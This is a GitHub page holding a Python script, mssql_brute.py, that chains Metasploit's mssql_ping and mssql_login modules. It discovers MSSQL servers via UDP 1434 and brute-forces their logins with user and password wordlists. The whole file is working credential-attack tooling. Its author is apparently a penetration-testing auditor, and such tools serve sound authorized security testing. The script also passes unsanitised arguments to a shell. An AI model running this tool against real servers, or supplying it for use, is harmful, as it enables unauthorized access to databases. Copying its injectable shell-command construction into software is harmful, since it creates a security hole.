-
Notifications
You must be signed in to change notification settings - Fork 47
/
Copy pathmssql_brute.py
executable file
·106 lines (81 loc) · 3.89 KB
/
mssql_brute.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#!/usr/bin/env python3
'''
@author: Matthew C. Jones, CPA, CISA, OSCP, CCFE
IS Audits & Consulting, LLC
TJS Deemer Dana LLP
-------------------------------------------------------------------------------
Chain together metasploit mssql_ping and brute force to allow direct brute
forcing of MSSQL servers using browser service on UDP 1434
-------------------------------------------------------------------------------
TODO - dunno?
'''
import sys
import argparse
import subprocess
import re
def main(argv):
parser = argparse.ArgumentParser(description='Find SQL servers using msf mssql_ping and brute force em')
parser.add_argument("--wordlist", "-w", default="", action="store", help='wordlist in user:pass format')
parser.add_argument("--username", "-u", default="", action="store", help='username')
parser.add_argument("--password", "-p", default="", action="store", help='password')
parser.add_argument("--userfile", "-U", default="", action="store", help='user file')
parser.add_argument("--passfile", "-P", default="", action="store", help='password file')
parser.add_argument("--domain", "-d", default="", action="store", help='domain / workgroup to use for windows authentication')
parser.add_argument("target", action="store", help="target")
args = parser.parse_args()
wordlist = args.wordlist
username = args.username
password = args.password
userfile = args.userfile
passfile = args.passfile
domain = args.domain
target = args.target
# Regex to escape ANSI color codes in metasploit output
# See https://stackoverflow.com/questions/14693701/how-can-i-remove-the-ansi-escape-sequences-from-a-string-in-python
# Color codes only - r'\x1B\[[0-?]*[ -/]*[@-~]'
# All ANSI escape codes - r'(\x9B|\x1B\[)[0-?]*[ -/]*[@-~]'
ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
command = "msfconsole -q -n -x '" \
"use auxiliary/scanner/mssql/mssql_ping;" \
"set RHOSTS " + target + ";" \
"run;" \
"exit -y'"
print(command)
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate()
output = ansi_escape.sub('',output)
print(output)
# returns a list of tuples with ip & port, e.g.
# [('10.54.76.2', '64599'), ('10.54.76.130', '60820')]
p = re.compile('information for (\d*\.\d*\.\d*\.\d*)[\s\S]+?tcp\s*=\s*(\d*)')
result = p.findall(output)
for host, port in result:
command = "msfconsole -q -n -x '" \
"use auxiliary/scanner/mssql/mssql_login;" \
"set RHOSTS " + host + ";" \
"set RPORT " + port + ";"
if domain:
command = command + "set USE_WINDOWS_AUTHENT true;" \
"set DOMAIN " + domain + ";"
# either going to use a userpass file or a combination of username/userfile/password/passfile
if wordlist:
command += "set USERPASS_FILE " + wordlist + ";"
else:
if username or userfile:
if username:
command += "set USERNAME " + username + ";"
elif userfile:
command += "set USER_FILE " + userfile + ";"
if password or passfile:
if password:
command += "set PASSWORD " + password + ";"
elif passfile:
command += "set PASS_FILE " + passfile + ";"
command += "run; exit -y'"
print(command)
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate()
output = ansi_escape.sub('',output)
print(output)
if __name__ == "__main__":
main(sys.argv[1:])